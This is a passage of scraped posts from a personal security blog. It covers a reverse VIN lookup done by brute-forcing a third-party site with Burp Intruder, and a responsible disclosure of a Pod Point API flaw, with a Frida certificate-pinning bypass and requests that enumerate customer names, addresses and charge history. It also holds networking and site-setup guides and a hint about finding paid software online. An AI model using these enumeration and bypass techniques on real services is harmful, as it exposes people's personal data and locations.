transmission had the number U8LFG677211.
I needed to find the corresponding VIN.\nNote: the original VIN and transmission number above are not his actual vehicle information, but are really close. The new transmission number is the real one.\nProblem The problem is that only the transmission number is known, and there weren\u0026rsquo;t any free or paid services (I may be wrong) that offered reverse VIN lookups from car parts. With the VIN, I can find out what country the car was manufactured for, but not with the transmission number, unless you do what I did.\nWhat is a VIN? The Vehicle Identification Number is a fingerprint of an automobile. It includes information about a vehicle such as country of origin, build date, build factory, name/model, model date, engine type, serial number and more.\nA VIN is 17 characters long and can be split into three parts: World Manufacturer Identifier (WMI) – a large list is available on Wikipedia, Vehicle Description Section (VDS) and Vehicle Identification Section (VIS).\nVIN example Here is an example of a 2020 Lamborghini Huracan VIN ZHW UT4ZF8 LLA13213. You can also use the Lamborghini VIN format available on Wikibooks. The breakdown below shows how it can be decoded:\nWorld Manufacturer Identifier ZHW 1st Z the manufacturer region (Italy). 2nd and 3rd HW the manufacturer (Lamborghini). Vehicle Description Section UT4ZF8 4th U the model type which is Huracan. 5th T the market which is US. 6th 4 the body type which is Convertible. 7th Z the engine type which is 470 kw/hp. 8th F features which are Passive Seatbelts, Driver \u0026amp; Passenger Airbags. 9th 8 the VIN check/security code. Vehicle Identification Section LLA13213 10th L the model year which is 2020. 11th L the manufacturer plant which is in Italy. 12th, 13th and 14th A13 the Manufacturing Code. 15th, 16th and 17th 213 the Serial Number. VIN lookup sites There are plenty of VIN lookup sites; some are also able to check whether the vehicle has been stolen, such as a UK-based site called isitnicked.com.
Or the US-based site www.nicb.org.\nMany sites do not provide the same level of information. For example the site en.vindecoder.pl doesn\u0026rsquo;t show any associated parts like engine numbers or transmission numbers, whilst others such as www.vindecoderz.com do.\nYou can see the transmission number U7LFP467454 is shown, as well as the engine number, and much more. It also shows the country the vehicle was manufactured for (Country [C17] Spain), which was quite important in my case.\nAnalysis To help with this project I used a piece of software that has a large collection of VINs. It does require a paid license but you can still extract VIN numbers and other useful information.\nMicrocat software Microcat is a software product by Infomedia Ltd that enables professionals such as car dealerships, mechanics or diagnostic engineers to perform searches and identify vehicles as well as their associated parts.\nThis product offers a selection of manufacturer databases, each with a specific year range. In this post I will be using the Microcat Hyundai 2008-2018 version, which is over 21GB. Note: this is a paid product; however, you can still find some downloads online by searching HYUNDAI 08-2018 Setup.\nInstallation The installation includes three discs or ISOs, each taking about 7GB. The size of the database is down to the vast amount of information that is included for each Hyundai model between 2008 and 2018, covering all models and associated parts.\nNow since I know the vehicle model and year range, I deselected all the default Hyundai models, and only selected a few. This way I won\u0026rsquo;t have to waste my VM\u0026rsquo;s storage on models that I\u0026rsquo;m not interested in. I only selected the Santa Fe model with the range of 2006-2012.\nInitial assessment I knew this project might involve brute-forcing at some point, so I started my initial analysis by examining the installation folder created by the Microcat software.
By default, two folders inside the C:\\ directory are created. One called HYW_Data and the other called MCHYW. The HYW_Data folder takes up most of the storage (20GB worth), so I decided to have a closer look.\nA folder called VIN immediately piqued my interest:\nC:\\HYW_Data\\VIN\u0026gt;dir Volume in drive C has no label. Volume Serial Number is 9AAC-43BE Directory of C:\\HYW_Data\\VIN 06/03/2022 17:02 \u0026lt;DIR\u0026gt; . 06/03/2022 17:02 \u0026lt;DIR\u0026gt; .. 04/07/2017 00:26 1,300 ckdcatmap.idx 22/06/2018 22:31 902,074 model.idx 21/02/2022 22:20 \u0026lt;DIR\u0026gt; options 21/02/2022 22:20 \u0026lt;DIR\u0026gt; Rego 22/06/2018 22:31 1,243,335,328 vin.idx 22/06/2018 22:50 725,762,912 vinrev.idx 4 File(s) 1,970,001,614 bytes 4 Dir(s) 9,730,449,408 bytes free Inside this directory a file called vin.idx exists, which is over 1.2GB.\nUsing strings The software is only available on Windows systems, and so I used WSL (Ubuntu), which comes with simple reverse engineering tools like strings, grep, xxd and more by default. I like using strings on files because it\u0026rsquo;s a very simple and quick way of identifying ASCII characters that may resemble something meaningful.\nThe strings command on the file named vin.idx showed the following:\ntester@DESKTOP-02HBA66:/mnt/c/HYW_Data/VIN$ strings vin.idx ... 200612055NMSG13D27H057982uh 200612055NMSG13D27H058050uh 200612055NMSG13D27H058095uh 200612055NMSG13D27H058100uh 200612075NMSG13D27H058176uh 200612065NMSG13D27H058209uh 200612065NMSG13D27H058226uh 200612065NMSG13D27H058274 ... Each record is on a new line, which makes it easier to understand. The first 8 digits, 20061205, are the date when the vehicle was made. The next 17 characters, 5NMSG13D27H057982, are the actual VIN.
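Given those fixed offsets (an 8-digit build date followed by a 17-character VIN), a record can be sliced with cut. A small sketch, using the sample record from the strings output above:

```shell
# Slice a vin.idx record into its fixed-width fields, as described above:
# characters 1-8 are the build date, characters 9-25 are the VIN.
record='200612055NMSG13D27H057982uh'
build_date=$(printf '%s' "$record" | cut -c 1-8)
vin=$(printf '%s' "$record" | cut -c 9-25)
echo "$build_date $vin"   # 20061205 5NMSG13D27H057982
```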
And the remaining characters are some sort of data format.\nThere are approximately 42,873,633 valid Hyundai VINs in this database.\ntester@DESKTOP-02HBA66:/mnt/c/HYW_Data/VIN$ strings vin.idx | wc -l 42873633 By manually scrolling through the database I was seeing all sorts of VINs for Hyundai models, even ones I had excluded during installation. I also noticed there were vehicles from 1992 which I thought were not part of the database.\nAnyway, I needed to start searching for only certain types of models and years.\nSearch queries I started off by confirming the VIN KMHSH81WP8U272568 actually exists, which it did.\ntester@DESKTOP-02HBA66:/mnt/c/HYW_Data/VIN$ strings vin.idx | grep \u0026#39;KMHSH81WP8U272568\u0026#39; 20070907KMHSH81WP8U272568^8 Now that the database was confirmed to be legitimate, the next step was to decrease the database size (1.2GB) by only focusing on Santa Fe models with specific engine types and years.\nI tried recursively searching for the transmission number U7LFP467454 but that didn\u0026rsquo;t get any hits. That would be too easy, right ;)\nLooking for patterns I started to search for only the U7LFP chunk of the transmission number to see if there were other examples. Many of the results were on b-parts.com, a website which sells replacement parts and sometimes includes the associated VIN.\nComparing the VINs, they both seem quite similar. I used www.ilcats.ru to find the full transmission number, which was U7LFP361217. The table shows the comparison.\n# VIN Model Type Transmission no. Year 1 KMHSH81WP8U272568 Santa Fe SH81W U7LFP467454 2008 2 KMHSH81WP7U232082 Santa Fe SH81W U7LFP361217 2007 I did the same thing for the new transmission number U8LFG677211 (the one that I need to find the VIN for). Again, only searching for the U8LFG part. 
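The fixed-width record layout described earlier (an 8-digit build date, then a 17-character VIN, then trailing data) can be sketched with standard shell tools. The sample file path and both records below are fabricated for illustration, not pulled from the real vin.idx:

```shell
# Two made-up records following the vin.idx layout described in the post
cat > /tmp/vin_sample.txt <<'EOF'
200612055NMSG13D27H057982uh
20070907KMHSH81WP8U272568^8
EOF

# Columns 1-8 hold the build date, columns 9-25 hold the VIN
while read -r rec; do
  built=$(printf '%s\n' "$rec" | cut -c 1-8)
  vin=$(printf '%s\n' "$rec" | cut -c 9-25)
  echo "$built $vin"
done < /tmp/vin_sample.txt
# prints: 20061205 5NMSG13D27H057982
#         20070907 KMHSH81WP8U272568
```

The same cut -c 9-25 column range reappears later when building the wordlists.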
A product listing page on ww.zapchast.com.ua was found that included some useful information.\nEven though the description says the model is year 2008, it is actually from 2009 based on the VIN. The table shows the comparison; #1 is the VIN I want to find.\n# VIN Model Type Transmission no. Year 1 ????????????????? Santa Fe SH81W U8LFG677211 2009? 2 KMHSH81WP9U?????? Santa Fe SH81W U8LFG?????? 2009 From all the information I could gather, the first few characters of the VIN KMHSH81WP stayed consistent throughout three years. And since the transmission number U8LFG?????? was associated with a VIN that most likely was from the year 2009, I had another search parameter.\nMaking wordlists Based on the two parameters, I created two much smaller files from the massive vin.idx database. This meant that the VINs were much easier to process, and by process I mean to brute-force.\nOne for models with SH81W and year 2008:\nstrings vin.idx | grep -e ^2008 | grep -e SH81W | cut -c 9-25 \u0026gt;\u0026gt; santa_fe_vin_2008.txt And the same model but with year 2009:\nstrings vin.idx | grep -e ^2009 | grep -e SH81W | cut -c 9-25 \u0026gt;\u0026gt; santa_fe_vin_2009.txt Going from 1.2GB to:\nsanta_fe_vin_2008.txt is 484KB santa_fe_vin_2009.txt is 112KB You might have noticed I used cut -c 9-25 to select only the VIN. Below is some example output data:\n... KMHSH81WR9U466119 KMHSH81WR9U466125 KMHSH81WR9U466130 KMHSH81WR9U466134 KMHSH81WR9U466138 KMHSH81WR9U466143 KMHSH81WR9U466148 KMHSH81WR9U466153 ... Bruteforce I know I could\u0026rsquo;ve just used the entire vin.idx database, but I would prefer not to hammer random VIN lookup sites with my requests. It\u0026rsquo;s also likely I\u0026rsquo;d get blocked.\nNow that I have a good dictionary wordlist, I can use any online VIN lookup site which also reveals the transmission number, and then just filter the responses. I\u0026rsquo;m very familiar with Burp Suite, so I opted to use Intruder to send my HTTP requests. 
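Before running it against the real vin.idx, the wordlist pipeline above can be sanity-checked on a tiny fabricated sample (these three records are made up; only the 2009 SH81W one should survive both filters):

```shell
# Fabricated records in the vin.idx layout: 8-digit date + 17-char VIN + trailing data
cat > /tmp/vin_mini.txt <<'EOF'
200612055NMSG13D27H057982uh
20080115KMHSH81WR8U466119zz
20090220KMHSH81WP9U440726yy
EOF

# Same shape as the real pipeline: keep 2009 builds of SH81W models,
# then cut columns 9-25 so only the 17-character VIN remains
grep -e ^2009 /tmp/vin_mini.txt | grep -e SH81W | cut -c 9-25
# prints: KMHSH81WP9U440726
```

The real run simply swaps the sample file for `strings vin.idx` and appends the result to a wordlist file.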
I found www.hyundaiforum.pro (non-HTTPS) to be the most responsive.\nAn example request looks like this:\nGET /view_vin_res.php?lang_code=EN\u0026amp;vin=KMHSH81WP9U440726 HTTP/1.1 Host: www.hyundaiforum.pro [...] Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Connection: close Setting the Attack type in Intruder as Sniper and position: And importing a simple list of VINs as the payload: The request payload count is only 1,819 because I did some further manual searches and found that P9U440002 - R9U448317 is the \u0026ldquo;goldilocks\u0026rdquo; VIN range I needed to focus on.\nOnce Burp Suite had finished the attack, I quickly applied a filter on the responses to only show requests which have the string U8LFG677211 for the transmission number: After applying the filter, only one request matched. Bingo!\nYou can also see in the following screenshot this part was in Turkey, which was the same country where my partner\u0026rsquo;s dad had his car serviced.\nSummary It was very interesting to dive into how VIN numbers are made up, and what information they contain. In addition, the Microcat software is a powerful tool not only for professional mechanics but also for reverse engineering certain car parts.\nResources Hyundai VIN Format World Manufacturer Identifiers (WMI) Reverse engineering Microcat US Database ","permalink":"https://markuta.com/vin-number-haystack/","title":"Reverse VIN lookup by part numbers"},{"categories":null,"contents":"This post will describe how I discovered a security flaw in Pod Point\u0026rsquo;s mobile app API endpoints. It covers bypassing certificate pinning with Frida, and demonstrates how attackers can steal full names, addresses, charging history, and more by simply having a registered account, which anyone can obtain.\nPod Point Pod Point is a UK based company established in 2009 that provides electric vehicle charging equipment to both businesses and individuals. 
It also operates what’s called the “Pod Point Network” where customers can use charge points across the country with a mobile app.\nInitial Discovery In March 2021, I researched EV charging providers. Most offered similar services and products. But since I didn\u0026rsquo;t want to spend any money buying physical hardware, I opted to check out their mobile apps instead.\nAfter registering a test account, I then started to look for any interesting features. I quickly noticed that the My Account menu had an option called \u0026ldquo;Add Home Charger\u0026rdquo;, allowing users to add Pod Point devices to their account by providing a unique device serial number.\nA quick Google image search revealed that serial numbers prefixed with \u0026ldquo;PSL\u0026rdquo; require a 6-digit number. As a quick sanity check, I entered a random number of \u0026ldquo;111111\u0026rdquo; to see if any devices existed.\nFigure-1: Android mobile app Pod Point \u0026ldquo;Add Home Charger\u0026rdquo; menu.\nAbove is a screenshot of the \u0026ldquo;Add Home Charger\u0026rdquo; menu with a randomly chosen device serial. After tapping \u0026ldquo;Add my home charger\u0026rdquo;, a confirmation message with a partial email address of the primary account holder is shown.\nA device with the serial number \u0026ldquo;PSL-111111\u0026rdquo; already exists and belongs to an account. Adding this device requires additional permission from the primary account holder in the form of an email confirmation link. It was pretty interesting seeing a partial email address.\nDiving Deeper To continue our research we needed to see how the app communicates with the backend services. 
To do this we set up Burp Suite: a proxy listener was configured on a testing machine, and then we updated the test mobile device’s network settings.\nI immediately hit a slight road block because the mobile app utilises Certificate Pinning.\nFigure-2: Burp Suite certificate error.\nBypassing certificate pinning Certificate pinning is a method used by app developers to restrict certificate usage. A Certificate Authority (CA) is usually ‘pinned’ to the app itself, and all other certificates are rejected, including root certificates trusted by the system.\nTo bypass this security measure, I opted to use the excellent instrumentation toolkit called Frida. Frida can attach to a process (app) and change the return values of functions. For example, it can inject into a function call that checks a certificate’s common name. I used a hook written by Tim Perry.\nA quick overview of the steps:\nConnect to a rooted device using adb Start a Frida server as root Locate the Pod Point app package name (com.podpoint) Launch the Pod Point app with Frida and a Hook.js Here is the app running under Frida with a certificate pinning bypass hook:\nfrida -U -l hook.js -f com.podpoint --no-pause [Pixel 3a::podpoint]-\u0026gt; [+] Bypassing OkHTTPv3 {1}: api.pod-point.com Frida detected and hooked into an OkHTTPv3 function that checks for a certificate with the common name (api.pod-point.com). It changed the return value to null or false. Going back to Burp Suite, the sitemap in the target menu now shows the website paths, meaning Frida bypassed certificate pinning.\nFigure-3: A list of paths of api.pod-point.com in the Burp Suite site map.\nIdentifying API endpoints The app talks to a server called api.pod-point.com. Multiple API endpoints relate to individual actions requested by the app. But not all APIs leak customer information. 
Some provide standard functionality required for users to log in and manage their accounts.\n/v4/addresses – publicly available charge addresses /v4/units – customer data and devices /v4/users/\u0026lt;USER_ID\u0026gt;/charges – customer full charge history /v4/pods – data on pod devices /v4/auth – logged-in user information /v4/sessions – authentication (email and password) /v4/password_reset – reset account passwords I\u0026rsquo;ll only be focusing on the first three API endpoints, which leak sensitive customer data or can be abused. The following few sections go into more detail on how and what data is actually leaked.\nGetting customer data When adding a Home Charger to your account, an HTTP GET request /v4/units?ppid={DEVICE_SERIAL} is sent to the server address api.pod-point.com. The request header includes an authorisation bearer token which authenticates the user. Any logged-in user can obtain this token.\nFigure-4: A request showing sensitive information of a customer being exposed.\nYou can see on the right side of the screenshot the server responds with a JSON object. This object contains a nested object called “installation”, which shows customer information and details about the device and its installation.\nA list of the customer’s data is revealed:\nCustomer’s unique user identification Customer’s full name Customer’s full address Customer’s partial email address We have also seen other information on Pod Point devices including the device’s last contact date, contactless status and unique device identifier. 
Attackers can use this to gather intelligence on whether a customer\u0026rsquo;s vehicle is charging.\nAdditionally, querying the endpoint with empty values returns a paginated data stream (5,652 pages with 25 records per page), indicating over 141,289 private customer records exposed on the Internet.\nGetting customer data via email address Not only is it possible to retrieve sensitive customer data by enumerating serial numbers but also by using the primary account holder’s email address. The API endpoint /v4/units allows users to query other customers’ data by using a parameter called customer_email.\nHere is an example of an HTTP GET request retrieving data using a specific email address:\nGET /v4/units?customer_email=some_user@example.com HTTP/1.1 user-agent: POD Point Native Mobile App [...] Authorisation: Bearer Token [...] Host: api.pod-point.com This is quite scary because if somebody knows your email address and knows that you use a Pod Point device, they can work out your full address by sending a simple HTTP request to the backend API endpoint.\nGetting customer charge history Using a customer’s ID it is possible to retrieve their entire charge history from the day they created their account. Just like with serial numbers, the customer ID can be enumerated in the same way.\nThe API endpoint /v4/users/{USER_ID}/charges is responsible for retrieving the charge history of customers. The server responds with a JSON object that shows information such as start and end times, duration, costs, locations, kW usage and more.\nHere is an example of an HTTP GET request to retrieve a user’s charge data:\nGET /v4/users/{USER_ID}/charges HTTP/1.1 user-agent: POD Point Native Mobile App [...] Authorisation: Bearer Token [...] 
Host: api.pod-point.com And in response we get back a JSON object with charge information:\n{ \u0026#34;charges\u0026#34;: [ { \u0026#34;id\u0026#34;: 17537077, \u0026#34;kwh_used\u0026#34;: 0.3, \u0026#34;duration\u0026#34;: 25, \u0026#34;starts_at\u0026#34;: \u0026#34;2021-05-30T06:13:10+00:00\u0026#34;, \u0026#34;ends_at\u0026#34;: \u0026#34;2021-05-30T06:38:37+00:00\u0026#34;, \u0026#34;billing_event\u0026#34;: { \u0026#34;id\u0026#34;: 2954682, \u0026#34;amount\u0026#34;: 0, \u0026#34;currency\u0026#34;: \u0026#34;GBP\u0026#34;, \u0026#34;exchange_rate\u0026#34;: 1, \u0026#34;presentment_currency\u0026#34;: \u0026#34;GBP\u0026#34; }, \u0026#34;location\u0026#34;: { \u0026#34;id\u0026#34;: 4522, \u0026#34;home\u0026#34;: false, \u0026#34;address\u0026#34;: { \u0026#34;id\u0026#34;: 1301, \u0026#34;business_name\u0026#34;: \u0026#34;Tesco Extra - Llansamlet\u0026#34; } }, \u0026#34;pod\u0026#34;: { \u0026#34;id\u0026#34;: 58782 }, \u0026#34;energy_cost\u0026#34;: 4 }, ... The API endpoint /v4/users/{USER_ID}/favourites does exist, which shows favourite charge locations, but access is restricted. However, attackers can still work out favourite locations by cross-referencing the location ID with the API in the next section.\nGetting public charge locations This particular API doesn’t expose any personally identifiable information since it’s used to help users find local charge points. However, it can be abused in combination with the previous example, giving attackers a way to figure out customers’ charge locations and predict their next location.\nThis API endpoint /v4/addresses returns a massive collection of Pod Point device addresses. Each page has metadata that shows there are approximately 15,000 devices. 
Unlike other API endpoints, I was not able to find usable search parameters apart from the page number.\nAn example of an HTTP GET request sent to /v4/addresses?page=218:\nAnd the response shows an address which belongs to a police station in Wiltshire, GB.\n{ \u0026#34;addresses\u0026#34;: [ { \u0026#34;id\u0026#34;: 58036, \u0026#34;name\u0026#34;: \u0026#34;HQ-Front FM hangar (left)\u0026#34;, \u0026#34;description\u0026#34;: \u0026#34;\u0026#34;, \u0026#34;pod_count\u0026#34;: 1, \u0026#34;type\u0026#34;: \u0026#34;Government\u0026#34;, \u0026#34;roadside\u0026#34;: false, \u0026#34;restrictions\u0026#34;: true, \u0026#34;email\u0026#34;: \u0026#34;XXXXXXXX@wiltshire.pnn.police.uk\u0026#34;, \u0026#34;location\u0026#34;: { \u0026#34;lat\u0026#34;: 51.3562169, \u0026#34;lng\u0026#34;: -1.9841969, \u0026#34;evZone\u0026#34;: false }, \u0026#34;address\u0026#34;: { \u0026#34;business_name\u0026#34;: \u0026#34;HQ-Front FM hangar (left)\u0026#34;, \u0026#34;address1\u0026#34;: \u0026#34;London Road\u0026#34;, \u0026#34;address2\u0026#34;: \u0026#34;\u0026#34;, \u0026#34;town\u0026#34;: \u0026#34;Wiltshire\u0026#34;, \u0026#34;postcode\u0026#34;: \u0026#34;SN10 2DN\u0026#34;, \u0026#34;country\u0026#34;: \u0026#34;GB\u0026#34; }, ... Summary The analysis has shown the Pod Point mobile app has several API endpoints which expose customer data. All attackers need is a registered account. In addition, there is no limit to the number of requests a user can make, which makes account and device enumeration possible. 
As long as the authorisation bearer token is valid, attackers can enumerate device serial numbers and harvest customer data.\nDisclosure timeline 15-Mar-2021 – Initial discovery 30-Jun-2021 – The first email sent to Pod Point support (no response) 10-Aug-2021 – A second follow-up email sent to Pod Point support (no response) 02-Sep-2021 – A third email sent to Pod Point app feedback (no response) 21-Sep-2021 – A fourth email sent to Pod Point support (no response) 28-Sep-2021 – Contacted Which? to help with the disclosure 30-Sep-2021 – Pod Point fixes the issue ","permalink":"https://markuta.com/pod-point-exposes-customer-data/","title":"Pod Point exposes customer data"},{"categories":null,"contents":"I recently decided to improve my home network by purchasing a pfSense box. I wanted to ditch my ISP-issued router, a Tilgin HG2381, which works well for simple networks but fails to offer advanced configuration options, like support for WireGuard VPN or VLANs.\nHyperOptic HyperOptic is a UK broadband provider which supports both IPv4 and IPv6 address assignment. For IPv4 addresses they use Carrier-grade NAT (CGN), which doesn\u0026rsquo;t allow exposing a service using port forwarding.\nA static IPv4 option is available which costs an extra £5 per month. But I decided to use IPv6 for all my services instead. This was a nightmare at first; I could not get my new pfSense box working correctly with IPv6.\nOn their website they provide a seemingly useful guide on configuring IPv6 with a third-party router. Link: https://www.hyperoptic.com/faq/posts/static-ip-addresses/\nHowever, these instructions did NOT work for me.\npfSense I\u0026rsquo;m using a Netgate SG-1100 as my main firewall and router, but these configuration options should still work on any hardware supported by pfSense software. Before changing anything, now is a good time to back up your current configuration.\nWAN settings Navigate to Interfaces and select the WAN interface. 
Change IPv6 Configuration Type to DHCP6 and scroll down until you see the DHCP6 Client Configuration section, then supply the following options:\nRequest only an IPv6 prefix DHCPv6 Prefix Delegation size (56) Send IPv6 prefix hint Debug Do not wait for a RA Do not allow PD/Address release Leave the rest of the options unchecked.\nIn my case I needed to do an extra step, which was to spoof the MAC address of the WAN interface to match my ISP-supplied device. To change the MAC address, go to System \u0026gt; Setup Wizard and click through until you get to (step 4), then copy the MAC address from your ISP-issued device.\nWithout this step my pfSense device would fail to obtain an IPv6 address.\nLAN or VLAN settings For your LAN or VLAN(s) settings, select your Interface and set the IPv6 Configuration Type to Track Interface. And in the Track IPv6 Interface specify:\nIPv6 Interface WAN IPv6 Prefix ID 0 I have several VLANs on my network so I need to set a different Prefix ID for each interface. To keep things organised I set the Prefix ID value to match the VLAN tag or network subnet e.g.\nVLAN10 Prefix ID - 10 IPv4 addresses - 10.1.10.XX IPv6 addresses – 2a01:4b00:XXXX:XX10:XXXX:XXXX:XXXX:XXXX VLAN20 Prefix ID - 20 IPv4 addresses - 10.1.20.XX IPv6 addresses – 2a01:4b00:XXXX:XX20:XXXX:XXXX:XXXX:XXXX This way I can immediately identify which VLAN an IPv6 address is from.\nDHCPv6 settings Finally, go to Services \u0026gt; DHCPv6 Server \u0026amp; RA. Next, select the interface you want to configure (e.g. LAN).\nEach interface has two types of settings, DHCPv6 Server and Router Advertisements.\nFor the DHCPv6 server, I completely disable it and click Save.\nFor Router Advertisements I set the options:\nRouter mode Assisted Router priority Normal Leave the rest as default and click Save.\nIssues and Solutions Debug mode for the DHCPv6 client gives us a better view of what\u0026rsquo;s happening. 
The DHCP log file is located at /var/log/dhcp.log and showed the following:\nMay 1 10:28:43 dhcp6c 75307 send solicit to ff02::1:2%em1 May 1 10:28:43 dhcp6c 75307 reset a timer on em1, state=SOLICIT, timeo=5, retrans=31928 May 1 10:29:15 dhcp6c 75307 Sending Solicit May 1 10:29:15 dhcp6c 75307 set client ID (len 14) May 1 10:29:15 dhcp6c 75307 set elapsed time (len 2) May 1 10:29:15 dhcp6c 75307 set option request (len 4) May 1 10:29:15 dhcp6c 75307 set IA_PD prefix May 1 10:29:15 dhcp6c 75307 set IA_PD A Netgate forum member experienced the exact same errors. The post IPv6 LAN with Tracking interface problem explains that they couldn\u0026rsquo;t get an IPv6 address on their LAN network.\nThis issue was likely caused by HyperOptic because they do not respond to solicitations coming from devices that are not issued by them. Spoofing the MAC address solved this.\n","permalink":"https://markuta.com/pfsense-ipv6-hyperoptic/","title":"pfSense and IPv6 on HyperOptic"},{"categories":null,"contents":"UPDATE (20-Mar-2022): MagiskHide has been dropped from Magisk 24.3. Check out my blog post on comparing root detection for 24 banking apps where I also use Frida to spawn apps.\nFor mobile app analysis, using a rooted device with Magisk and Frida has become my bread and butter. I\u0026rsquo;m aware that emulators exist (which I also use) but solutions such as Android Studio or Genymotion fail to offer the same level of performance as a physical device. I use a second-hand Google Pixel 3a bought on Amazon for most of my testing.\nMagisk Magisk is a suite of open source software for customizing Android devices. It provides users the ability to execute system commands on production devices and even extend features through modules. 
Magisk also provides a neat feature called MagiskHide, which hides certain root artifacts from detection methods used by apps.\nFrida Frida is a dynamic code instrumentation toolkit that allows you to inject JavaScript code into native apps on Windows, macOS, GNU/Linux, iOS and Android. I use Frida mostly for bypassing Certificate Pinning and hooking into interesting functions - read my post on how I discovered an EV provider leaking 140k customers\u0026rsquo; data.\nMagiskHide and Frida work together fine if you only want to attach to an already running process. There are three ways (I am not covering patched APKs):\nAttach by the process ID e.g. frida -U -l hook.js -p \u0026lt;PID\u0026gt; Attach by the process name e.g. frida -U -l hook.js -n 'app name' Attach by unique app name e.g. frida -U -l hook.js com.example.app Problem When MagiskHide is enabled, it is not possible to spawn or launch a process using Frida (with the -f option). You will get the following error when you try to run frida -U -l hook.js -f com.example.app --no-pause:\nFailed to spawn: unable to access zygote while preparing for app launch; try disabling Magisk Hide in case it is active Why? The short answer is both Frida and Magisk require the Zygote module to spawn processes.\nFor people wondering why this is needed, Magisk Hide ptraces the zygote module in order to intercept calls, which locks out other apps from doing so, and zygote is needed by Frida to spawn apps and do early hooking. – gmlime on Stackoverflow\nSolution(s) These are more workarounds than fixes.\nDisable MagiskHide The obvious one is to temporarily disable MagiskHide. You can quickly disable it through the command-line using adb. Run adb shell \u0026quot;su -c magiskhide disable\u0026quot; (note: using su -c because adb shell root does not work on production builds).\nRun a Script Another way is to create a script to automatically start an app using built-in Android utilities, then quickly attach to that process with Frida. 
This method is not foolproof but does provide decent results. You can use utilities like adb shell am start or adb shell monkey to spawn a process.\nI personally like to use the latter because you don\u0026rsquo;t need to specify an Activity Name, only the app itself. Below is a simple script I wrote which spawns an app using monkey, gets the PID of the process, and then finally attaches to it using the local Frida client:\n#!/bin/bash run_proc=$(adb shell monkey -p \u0026#34;$1\u0026#34; 1) get_pid=$(adb shell ps | grep -i \u0026#34;$1\u0026#34; | awk \u0026#39;{printf $2}\u0026#39;) if [[ -z \u0026#34;$get_pid\u0026#34; ]]; then echo \u0026#34;Didn\u0026#39;t find PID :(\u0026#34; else echo \u0026#34;Attaching to process..\u0026#34; frida -U -l \u0026#34;$2\u0026#34; -p \u0026#34;$get_pid\u0026#34; fi Here is an example of the script launching Adidas\u0026rsquo;s Confirmed app:\nTo use this script you need the following:\nA Frida server running on the mobile device A Frida client on your local machine A device connected via USB A hook.js file to load Resources There were a few users on Github also experiencing the same issue here and here. Somebody suggested temporarily disabling MagiskHide, spawning an app using Frida, and then re-enabling it again. However, this didn\u0026rsquo;t work for me and caused my device to crash and reboot.\n","permalink":"https://markuta.com/frida-and-magisk-hide/","title":"Frida and MagiskHide"},{"categories":null,"contents":"Update (25/11/21) added a section on Page Rules.\nFor markuta.com I now use Hugo with a theme called PaperMod. Github is still used for storage, on a private repository (Github Pages doesn\u0026rsquo;t allow private repos for free accounts). And Cloudflare Pages is linked to Github to deploy the website.\nRequirements To get started you need the following:\nHugo and Git software Github account (free) Cloudflare account (free) Domain name (not required but nice to have) Install Software You need to make sure Hugo and Git are installed. For Linux: sudo apt install hugo. For macOS via brew: brew install hugo. 
And for Windows I\u0026rsquo;d recommend using WSL.\nGithub Create a Repository Go ahead and log in to Github and create a new (public or private) repository, then do a git clone to your local device.\nLink access with Cloudflare You can link your Cloudflare account now or later.\nHugo Create a new Hugo site Next, navigate to the cloned repo folder on your local machine and type the following Hugo command to create a new site file structure. The --force flag will write to the directory even if it already exists; otherwise it\u0026rsquo;ll complain.\ncd ~/my-blog hugo new site . --force You can also do the previous steps in reverse: make a new Hugo site first, then create a repo.\nChoose a Hugo theme It\u0026rsquo;s a good time to choose a Hugo theme. Check out https://themes.gohugo.io/ for a big list.\nMost themes are available on Github and can be installed via submodules. For example, to install my current theme (PaperMod), go to the root folder of your repository and run the following:\ngit submodule add https://github.com/adityatelange/hugo-PaperMod.git themes/PaperMod git submodule update --init --recursive Edit Hugo config It is important to note that each theme may have its own configuration file which you need to use. In the case of the PaperMod theme a sample is provided: config.yml.\nA converted TOML-based config file (snippet) will look something like this:\nbaseURL = \u0026#34;https://markuta.com/\u0026#34; title = \u0026#34;Markuta\u0026#34; paginate = 5 theme = \u0026#34;PaperMod\u0026#34; enableRobotsTXT = true buildDrafts = false buildFuture = false buildExpired = false googleAnalytics = \u0026#34;UA-XXXXXX\u0026#34; [minify] disableXML = true minifyOutput = false # Cloudflare Pages has issues when true [params] env = \u0026#34;production\u0026#34; ... 
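For reference, the same snippet in the theme's native YAML form would look roughly like this (a hand-converted sketch of the TOML above, not a file shipped with PaperMod):

```yaml
baseURL: "https://markuta.com/"
title: "Markuta"
paginate: 5
theme: "PaperMod"
enableRobotsTXT: true
buildDrafts: false
buildFuture: false
buildExpired: false
googleAnalytics: "UA-XXXXXX"

minify:
  disableXML: true
  minifyOutput: false  # Cloudflare Pages has issues when true

params:
  env: "production"
```

Hugo accepts either format; pick one and stay consistent so the theme's sample config remains easy to compare against.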
Run Hugo site locally To run the Hugo site locally, first navigate to the root of your repository and type:\nhugo server -D A local web server will start listening on http://localhost:1313 with output similar to:\nhugo server -D Start building sites … hugo v0.87.0+extended darwin/amd64 BuildDate=unknown | EN -------------------+------ Pages | 132 Paginator pages | 6 Non-page files | 44 Static files | 12 Processed images | 0 Aliases | 53 Sitemaps | 1 Cleaned | 0 Built in 130 ms To stop the web server type ctrl+c.\nCloudflare Create a project Log in to Cloudflare and select Pages, then click on create a new project. You will be asked to link your Github account and to select a repository. I tend to only allow Cloudflare permission to a selected few rather than all of the repositories.\nClick \u0026ldquo;Begin setup\u0026rdquo; to continue.\nSet up builds and deployments Choose a project name, which can only contain lowercase letters (a-z), numbers (0-9) and dashes. I use Github\u0026rsquo;s default main as the production branch.\nNext configure the Build settings options:\nFor Framework preset set: Hugo For Build command choose hugo (will be automatically set) Build output directory choose public (will be automatically set) Skip Root directory Environment variables Add new variable name HUGO_VERSION with 0.87.0 Finally click Save and Deploy.\nIf everything went fine your site should be deployed and accessible via \u0026lt;project-name\u0026gt;.pages.dev. You can stop here or continue to set up your own domain.\nAdd custom domains From the previous section hit continue to project or just navigate to your project from the Pages menu. Under your project is a Custom domains tab and below that is a Set up a custom domain button. Click it and you will then be asked to give a domain name e.g. markuta.com\nSince I already use Cloudflare for DNS management it automatically edited the settings for me. 
